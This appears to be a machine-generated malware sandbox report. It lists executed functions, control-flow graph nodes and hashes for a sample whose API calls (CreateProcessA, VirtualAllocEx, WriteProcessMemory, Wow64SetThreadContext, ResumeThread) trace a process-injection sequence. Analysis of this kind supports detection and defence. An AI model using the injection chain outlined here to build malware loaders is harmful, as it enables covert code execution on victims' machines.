28293->28374 28294->28252 28378 796cf20 28297->28378 28382 796cf18 28297->28382 28298 93e0872 28302 93e04aa 28301->28302 28304 796d4f0 WriteProcessMemory 28302->28304 28305 796d4e9 WriteProcessMemory 28302->28305 28303 93e0811 28303->28252 28304->28303 28305->28303 28307 93e063e 28306->28307 28386 796d430 28307->28386 28390 796d429 28307->28390 28308 93e065c 28316 796cf20 Wow64SetThreadContext 28311->28316 28317 796cf18 Wow64SetThreadContext 28311->28317 28312 93e0313 28313 93e09ab 28312->28313 28314 796ce70 ResumeThread 28312->28314 28315 796ce68 ResumeThread 28312->28315 28313->28252 28314->28313 28315->28313 28316->28312 28317->28312 28319 93e0111 28318->28319 28394 796d76c 28319->28394 28398 796d778 28319->28398 28324 93e07ad 28323->28324 28325 93e0947 28324->28325 28326 796d4f0 WriteProcessMemory 28324->28326 28327 796d4e9 WriteProcessMemory 28324->28327 28326->28325 28327->28325 28329 93e04dd 28328->28329 28402 796d5e0 28329->28402 28406 796d5d9 28329->28406 28330 93e0257 28330->28252 28334 93e00f3 28333->28334 28335 93e0170 28333->28335 28334->28252 28335->28252 28335->28334 28337 796d76c CreateProcessA 28335->28337 28338 796d778 CreateProcessA 28335->28338 28336 93e022c 28336->28252 28337->28336 28338->28336 28340 93e067f 28339->28340 28341 93e0947 28340->28341 28342 796d4f0 WriteProcessMemory 28340->28342 28343 796d4e9 WriteProcessMemory 28340->28343 28342->28341 28343->28341 28346 796d4f0 WriteProcessMemory 28344->28346 28347 796d4e9 WriteProcessMemory 28344->28347 28345 93e0947 28346->28345 28347->28345 28349 93e06d7 28348->28349 28351 796ce70 ResumeThread 28349->28351 28352 796ce68 ResumeThread 28349->28352 28350 93e09ab 28350->28252 28351->28350 28352->28350 28355 796d4f0 WriteProcessMemory 28353->28355 28356 796d4e9 WriteProcessMemory 28353->28356 28354 93e08b8 28355->28354 28356->28354 28358 93e0759 28357->28358 28360 796ce70 ResumeThread 28358->28360 28361 796ce68 ResumeThread 28358->28361 28359 93e09ab 28359->28252 28360->28359 28361->28359 28363 796ceb0 ResumeThread 28362->28363 28365 796cee1 28363->28365 28365->28289 28367 796ceb0 ResumeThread 28366->28367 28369 796cee1 28367->28369 28369->28289 28371 796d538 WriteProcessMemory 28370->28371 28373 796d58f 28371->28373 28373->28294 28375 796d538 WriteProcessMemory 28374->28375 28377 796d58f 28375->28377 28377->28294 28379 796cf65 Wow64SetThreadContext 28378->28379 28381 796cfad 28379->28381 28381->28298 28383 796cf65 Wow64SetThreadContext 28382->28383 28385 796cfad 28383->28385 28385->28298 28387 796d470 VirtualAllocEx 28386->28387 28389 796d4ad 28387->28389 28389->28308 28391 796d430 VirtualAllocEx 28390->28391 28393 796d4ad 28391->28393 28393->28308 28395 796d778 CreateProcessA 28394->28395 28397 796d9c3 28395->28397 28399 796d801 CreateProcessA 28398->28399 28401 796d9c3 28399->28401 28401->28401 28403 796d62b ReadProcessMemory 28402->28403 28405 796d66f 28403->28405 28405->28330 28407 796d62b ReadProcessMemory 28406->28407 28409 796d66f 28407->28409 28409->28330 28410 796de00 28411 796db94 28410->28411 28412 796dd30 28411->28412 28413 796fa71 12 API calls 28411->28413 28414 796fade 12 API calls 28411->28414 28413->28411 28414->28411 28222 1644668 28223 164467a 28222->28223 28224 1644686 28223->28224 28226 1644778 28223->28226 28227 164479d 28226->28227 28231 1644878 28227->28231 28235 1644888 28227->28235 28233 16448af 28231->28233 28232 164498c 28232->28232 28233->28232 28239 1644560 28233->28239 28237 16448af 28235->28237 28236 164498c 28237->28236 28238 1644560 CreateActCtxA 28237->28238 28238->28236 28240 1645d18 CreateActCtxA 28239->28240 28242 1645ddb 28240->28242 28242->28242 28243 164d828 DuplicateHandle 28244 164d8be 28243->28244

                                Executed Functions

                                Function 0164D5D0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 164d5d0-164d66f GetCurrentProcess 298 164d671-164d677 294->298 299 164d678-164d6ac GetCurrentThread 294->299 298->299 300 164d6b5-164d6e9 GetCurrentProcess 299->300 301 164d6ae-164d6b4 299->301 303 164d6f2-164d70d call 164d7b1 300->303 304 164d6eb-164d6f1 300->304 301->300 306 164d713-164d742 GetCurrentThreadId 303->306 304->303 308 164d744-164d74a 306->308 309 164d74b-164d7ad 306->309 308->309
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0164D65E
                                • GetCurrentThread.KERNEL32 ref: 0164D69B
                                • GetCurrentProcess.KERNEL32 ref: 0164D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0164D731
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 0ce6debf65b7efe62eefe77a0999f38e0cefca411e8f6acefeec1395f5392eff
                                • Instruction ID: 58558f020a93a969c324e1802845811703e774493bbd1b1e12f5ec841b0b8a3c
                                • Opcode Fuzzy Hash: 0ce6debf65b7efe62eefe77a0999f38e0cefca411e8f6acefeec1395f5392eff
                                • Instruction Fuzzy Hash: D75144B09012498FDB18EFA9D948BEEBBF1FF89304F208459D509A7760DB389944CF65
                                Function 0164D5E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 316 164d5e0-164d66f GetCurrentProcess 320 164d671-164d677 316->320 321 164d678-164d6ac GetCurrentThread 316->321 320->321 322 164d6b5-164d6e9 GetCurrentProcess 321->322 323 164d6ae-164d6b4 321->323 325 164d6f2-164d70d call 164d7b1 322->325 326 164d6eb-164d6f1 322->326 323->322 328 164d713-164d742 GetCurrentThreadId 325->328 326->325 330 164d744-164d74a 328->330 331 164d74b-164d7ad 328->331 330->331
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0164D65E
                                • GetCurrentThread.KERNEL32 ref: 0164D69B
                                • GetCurrentProcess.KERNEL32 ref: 0164D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0164D731
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 92b0c770b96b3b062b411b54d9b912ad24c5de163db7aaf35482a07b30188488
                                • Instruction ID: cad92d7062eeb8e35f1c7fa16f3efe3d98cee4e7f2ad80c5d9fb99c3244cbdca
                                • Opcode Fuzzy Hash: 92b0c770b96b3b062b411b54d9b912ad24c5de163db7aaf35482a07b30188488
                                • Instruction Fuzzy Hash: 0E5135B09012498FDB18DFA9D948BAEBBF1FF88304F208059D509A7760DB385944CF65
                                Function 0796D76C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 498 796d76c-796d80d 501 796d846-796d866 498->501 502 796d80f-796d819 498->502 507 796d89f-796d8ce 501->507 508 796d868-796d872 501->508 502->501 503 796d81b-796d81d 502->503 505 796d840-796d843 503->505 506 796d81f-796d829 503->506 505->501 509 796d82d-796d83c 506->509 510 796d82b 506->510 518 796d907-796d9c1 CreateProcessA 507->518 519 796d8d0-796d8da 507->519 508->507 512 796d874-796d876 508->512 509->509 511 796d83e 509->511 510->509 511->505 513 796d878-796d882 512->513 514 796d899-796d89c 512->514 516 796d886-796d895 513->516 517 796d884 513->517 514->507 516->516 521 796d897 516->521 517->516 530 796d9c3-796d9c9 518->530 531 796d9ca-796da50 518->531 519->518 520 796d8dc-796d8de 519->520 522 796d8e0-796d8ea 520->522 523 796d901-796d904 520->523 521->514 525 796d8ee-796d8fd 522->525 526 796d8ec 522->526 523->518 525->525 527 796d8ff 525->527 526->525 527->523 530->531 541 796da52-796da56 531->541 542 796da60-796da64 531->542 541->542 543 796da58 541->543 544 796da66-796da6a 542->544 545 796da74-796da78 542->545 543->542 544->545 546 796da6c 544->546 547 796da7a-796da7e 545->547 548 796da88-796da8c 545->548 546->545 547->548 549 796da80 547->549 550 796da9e-796daa5 548->550 551 796da8e-796da94 548->551 549->548 552 796daa7-796dab6 550->552 553 796dabc 550->553 551->550 552->553 555 796dabd 553->555 555->555
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796D9AE
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0bc34e27fb139337d752e84257865a2072352b4f17f1478003e1503f2ae9fa15
                                • Instruction ID: 281080384a4d2f47ef818dbf13f3166e85310f1eeb602d2df627136b56c93567
                                • Opcode Fuzzy Hash: 0bc34e27fb139337d752e84257865a2072352b4f17f1478003e1503f2ae9fa15
                                • Instruction Fuzzy Hash: 2EA17FB1E0021ACFDF24CF68C8457EEBBB6BF48718F148269D819A7240DB749985CF91
                                Function 0796D778 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 556 796d778-796d80d 558 796d846-796d866 556->558 559 796d80f-796d819 556->559 564 796d89f-796d8ce 558->564 565 796d868-796d872 558->565 559->558 560 796d81b-796d81d 559->560 562 796d840-796d843 560->562 563 796d81f-796d829 560->563 562->558 566 796d82d-796d83c 563->566 567 796d82b 563->567 575 796d907-796d9c1 CreateProcessA 564->575 576 796d8d0-796d8da 564->576 565->564 569 796d874-796d876 565->569 566->566 568 796d83e 566->568 567->566 568->562 570 796d878-796d882 569->570 571 796d899-796d89c 569->571 573 796d886-796d895 570->573 574 796d884 570->574 571->564 573->573 578 796d897 573->578 574->573 587 796d9c3-796d9c9 575->587 588 796d9ca-796da50 575->588 576->575 577 796d8dc-796d8de 576->577 579 796d8e0-796d8ea 577->579 580 796d901-796d904 577->580 578->571 582 796d8ee-796d8fd 579->582 583 796d8ec 579->583 580->575 582->582 584 796d8ff 582->584 583->582 584->580 587->588 598 796da52-796da56 588->598 599 796da60-796da64 588->599 598->599 600 796da58 598->600 601 796da66-796da6a 599->601 602 796da74-796da78 599->602 600->599 601->602 603 796da6c 601->603 604 796da7a-796da7e 602->604 605 796da88-796da8c 602->605 603->602 604->605 606 796da80 604->606 607 796da9e-796daa5 605->607 608 796da8e-796da94 605->608 606->605 609 796daa7-796dab6 607->609 610 796dabc 607->610 608->607 609->610 612 796dabd 610->612 612->612
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796D9AE
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ba0515d48d0bf98035cf98c75eabdefeced1aa95ce7a01f8c45e569752c3aa0a
                                • Instruction ID: 340d57632663559d52a622cdfddd5da413d64e458ab839e8674b5256c89f6c7c
                                • Opcode Fuzzy Hash: ba0515d48d0bf98035cf98c75eabdefeced1aa95ce7a01f8c45e569752c3aa0a
                                • Instruction Fuzzy Hash: 6A916EB1E0021ACFDF24CF69C8457EEBBB6BF48718F148269D819A7240DB749985CF91
                                Function 0164B33A Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 613 164b33a-164b357 614 164b383-164b387 613->614 615 164b359-164b366 call 1649db8 613->615 616 164b389-164b393 614->616 617 164b39b-164b3dc 614->617 622 164b37c 615->622 623 164b368 615->623 616->617 624 164b3de-164b3e6 617->624 625 164b3e9-164b3f7 617->625 622->614 668 164b36e call 164b5e0 623->668 669 164b36e call 164b5d0 623->669 624->625 627 164b3f9-164b3fe 625->627 628 164b41b-164b41d 625->628 626 164b374-164b376 626->622 629 164b4b8-164b578 626->629 631 164b400-164b407 call 164b000 627->631 632 164b409 627->632 630 164b420-164b427 628->630 663 164b580-164b5ab GetModuleHandleW 629->663 664 164b57a-164b57d 629->664 634 164b434-164b43b 630->634 635 164b429-164b431 630->635 633 164b40b-164b419 631->633 632->633 633->630 638 164b43d-164b445 634->638 639 164b448-164b451 call 164b010 634->639 635->634 638->639 644 164b453-164b45b 639->644 645 164b45e-164b463 639->645 644->645 646 164b465-164b46c 645->646 647 164b481-164b48e 645->647 646->647 649 164b46e-164b47e call 164b020 call 164b030 646->649 654 164b490-164b4ae 647->654 655 164b4b1-164b4b7 647->655 649->647 654->655 665 164b5b4-164b5c8 663->665 666 164b5ad-164b5b3 663->666 664->663 666->665 668->626 669->626
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0164B59E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e567a6bd42c53312fd805479cf5db762bedf9d7a8ea68091b4a54e3bde6ed5bb
                                • Instruction ID: f9940352bc056a9345244b5f272703024834450abb42f7d2cf75c8100a5105dc
                                • Opcode Fuzzy Hash: e567a6bd42c53312fd805479cf5db762bedf9d7a8ea68091b4a54e3bde6ed5bb
                                • Instruction Fuzzy Hash: 82811170A00B058FD725DF29D88479ABBF1FF88204F04892ED48ADBB55D734E94ACB90
                                Function 01645D0C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 778 1645d0c-1645dd9 CreateActCtxA 780 1645de2-1645e3c 778->780 781 1645ddb-1645de1 778->781 788 1645e3e-1645e41 780->788 789 1645e4b-1645e4f 780->789 781->780 788->789 790 1645e60 789->790 791 1645e51-1645e5d 789->791 792 1645e61 790->792 791->790 792->792
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01645DC9
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 245e6f92f7841a95826e84213c17e8eef7f95fde324c975ff8ba4825dbf9ca24
                                • Instruction ID: da792cdc05b50ad57a48ab7105f471edd9a9b246e01d837591400f88d4ab81d4
                                • Opcode Fuzzy Hash: 245e6f92f7841a95826e84213c17e8eef7f95fde324c975ff8ba4825dbf9ca24
                                • Instruction Fuzzy Hash: B04100B1C00619CFDB24DFA9C844BDDBBB1BF49304F20806AD419AB265DB756946CF91
                                Function 01644560 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 794 1644560-1645dd9 CreateActCtxA 797 1645de2-1645e3c 794->797 798 1645ddb-1645de1 794->798 805 1645e3e-1645e41 797->805 806 1645e4b-1645e4f 797->806 798->797 805->806 807 1645e60 806->807 808 1645e51-1645e5d 806->808 809 1645e61 807->809 808->807 809->809
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01645DC9
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: ad15875c6771c474910c9859dbc2cf794a27714cbb3429669d59b476b330c068
                                • Instruction ID: 76f25b7fc3abb823fbc974e824be2cb2503d5482e66ffac75e885d710045ddf7
                                • Opcode Fuzzy Hash: ad15875c6771c474910c9859dbc2cf794a27714cbb3429669d59b476b330c068
                                • Instruction Fuzzy Hash: 7C411FB0C00619CFDB24CFA9C844B8EBBF1BF48704F20806AD409AB265DB75694ACF90
                                Function 0796D4E9 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 811 796d4e9-796d53e 813 796d540-796d54c 811->813 814 796d54e-796d58d WriteProcessMemory 811->814 813->814 816 796d596-796d5c6 814->816 817 796d58f-796d595 814->817 817->816
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0796D580
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 9135d08bc1ba16e556ed29981d89c667e4c89186b874f7e63f67327c63be350c
                                • Instruction ID: 09868aee0d73849104f9e12832532fccea83451ca420444a098232a2fee420b4
                                • Opcode Fuzzy Hash: 9135d08bc1ba16e556ed29981d89c667e4c89186b874f7e63f67327c63be350c
                                • Instruction Fuzzy Hash: D62104B5A002599FDB10DFA9C884AEEBBF5FF48314F10842AE919A7244C7789645CBA0
                                Function 0796D4F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 821 796d4f0-796d53e 823 796d540-796d54c 821->823 824 796d54e-796d58d WriteProcessMemory 821->824 823->824 826 796d596-796d5c6 824->826 827 796d58f-796d595 824->827 827->826
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0796D580
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fab954936f9c1e906d0621af591d6d9dcfff1ee0d660714e47966dad09ce8b65
                                • Instruction ID: 7a864bff29e5e3418728783d0ecba4df23b94cebe6c503126d1e9a91113589f9
                                • Opcode Fuzzy Hash: fab954936f9c1e906d0621af591d6d9dcfff1ee0d660714e47966dad09ce8b65
                                • Instruction Fuzzy Hash: 962139B59003599FCF10DFA9C885BEEBBF5FF48314F108429E919A7244C7789944CBA0
                                Function 0796CF18 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796CF9E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 74ddf4d9a85d8f031f81454ec6dd8d3b606348d2f4bc5455b727dad43bc39e85
                                • Instruction ID: 503a20ce6b865e9c4952f3c0951ffe7685185868cd822e8d137297105d0724a5
                                • Opcode Fuzzy Hash: 74ddf4d9a85d8f031f81454ec6dd8d3b606348d2f4bc5455b727dad43bc39e85
                                • Instruction Fuzzy Hash: D42138B19002099FDB10DFAAC4857EEBFF4EF89314F14842AE459A7251CB78A945CFA0
                                Function 0164D820 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164D8AF
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: c604a68f0934671e89fbfc7d244bc8e3629443da472546e3b1bfee55f8f631d0
                                • Instruction ID: 0bc20df2a9fdc8c8bede50bfd23f83e3d9ba30d727021fb063a6ef47c81ca79c
                                • Opcode Fuzzy Hash: c604a68f0934671e89fbfc7d244bc8e3629443da472546e3b1bfee55f8f631d0
                                • Instruction Fuzzy Hash: 3021E3B5D002089FDB10CF9AD984AEEBBF5FB48310F14841AE918A7350D378A954CFA0
                                Function 0796D5D9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0796D660
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: e4f7daf0923c887ddbf772144a9159d7184aa669ef579a81939f2513c9adffc2
                                • Instruction ID: 9b213148840fa9d5327c3bfabd4a994f91d752603aac3d4030bbfce88071df51
                                • Opcode Fuzzy Hash: e4f7daf0923c887ddbf772144a9159d7184aa669ef579a81939f2513c9adffc2
                                • Instruction Fuzzy Hash: 7B2128B1D007599FCF10DFAAC885AEEBBF5FF48310F108429E559A7250D7389945CBA1
                                Function 0796D5E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0796D660
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 106f90887b6f01de4619768697e58d73447e0f22c06753254d31375f0980c6c0
                                • Instruction ID: 8704ea1ff132618275a90c9a6ec713626b136226f7d0c1e2cea24a454b663189
                                • Opcode Fuzzy Hash: 106f90887b6f01de4619768697e58d73447e0f22c06753254d31375f0980c6c0
                                • Instruction Fuzzy Hash: 402137B1D007499FCB10DFAAC884AEEFBF5FF48310F10842AE519A7250CB389944CBA5
                                Function 0796CF20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796CF9E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: d43569c6a3094a79015b9eafe787892da3378841b938a5204f2135b77debc7f3
                                • Instruction ID: 3ab69b122c6a35473229290b3253208337034ca8a344853a9b117ecec524d1f8
                                • Opcode Fuzzy Hash: d43569c6a3094a79015b9eafe787892da3378841b938a5204f2135b77debc7f3
                                • Instruction Fuzzy Hash: BF2115B19003098FDB10DFAAC4857EEFBF4EF89314F14842AE559A7240CB78A945CFA5
                                Function 0164D828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164D8AF
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: aedf70144b6d4c640c8c056eac67c1750e092e7e587952960192e0a0f8409cfd
                                • Instruction ID: 4274b51516fde92ae898fd46dca3b6674a96876bd666505c61de7d3082dea09d
                                • Opcode Fuzzy Hash: aedf70144b6d4c640c8c056eac67c1750e092e7e587952960192e0a0f8409cfd
                                • Instruction Fuzzy Hash: 2A21C4B5D002489FDB10CF9AD984AEEBFF9FB48310F14841AE918A7350D378A954CFA5
                                Function 0796D429 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0796D49E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 899ca45c90601972a8ebaacd7f6e1cfc335adf94aabe54e6b75450fd32230823
                                • Instruction ID: a580f7715912e9b7d5a1bb5d895bd3de807cc94a368520c18afa021006c6153b
                                • Opcode Fuzzy Hash: 899ca45c90601972a8ebaacd7f6e1cfc335adf94aabe54e6b75450fd32230823
                                • Instruction Fuzzy Hash: B0115CB59002499FDB20DFAAC8456EFFFF5EF88324F148419E519A7250CB39A554CFA0
                                Function 0796D430 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0796D49E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 03e9e59a0f8fe14d0f2c0678564926d3d457fa07cc6a495e8514b82a5a01c1dd
                                • Instruction ID: ad97de3cc6188430f0a6b4355254c7e77e76125f8cafe8ab95d0d88725770f5f
                                • Opcode Fuzzy Hash: 03e9e59a0f8fe14d0f2c0678564926d3d457fa07cc6a495e8514b82a5a01c1dd
                                • Instruction Fuzzy Hash: 561137B59002499FDB10DFAAC844AEEBFF5EF88324F148419E519A7250CB79A944CFA0
                                Function 0796CE68 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: f722b8f59107febf54f5e14c8c89ddbfd33e04da4f0149aca7e23369c8de578a
                                • Instruction ID: 7520f26f5048e835bd3fd0be45d28f778677be3d6a22299e0fbb653060fa98da
                                • Opcode Fuzzy Hash: f722b8f59107febf54f5e14c8c89ddbfd33e04da4f0149aca7e23369c8de578a
                                • Instruction Fuzzy Hash: 761146B5D002498BDB20DFAAC4497EEFBF5AF88314F20841AD519A7640CB79A944CBA0
                                Function 0796CE70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 95140a9aee9ac51b183bddb7be4e939e16f9647dc5b7e475f960a23cc062e0d3
                                • Instruction ID: 819f1e41ea536201be603004f30cb49b110dd57051facbcdf0e24f6bbc43fc6f
                                • Opcode Fuzzy Hash: 95140a9aee9ac51b183bddb7be4e939e16f9647dc5b7e475f960a23cc062e0d3
                                • Instruction Fuzzy Hash: 41113AB5D003498FDB20DFAAC4457EEFBF5EF89314F24841AD519A7240CB79A944CBA4
                                Function 0164B538 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
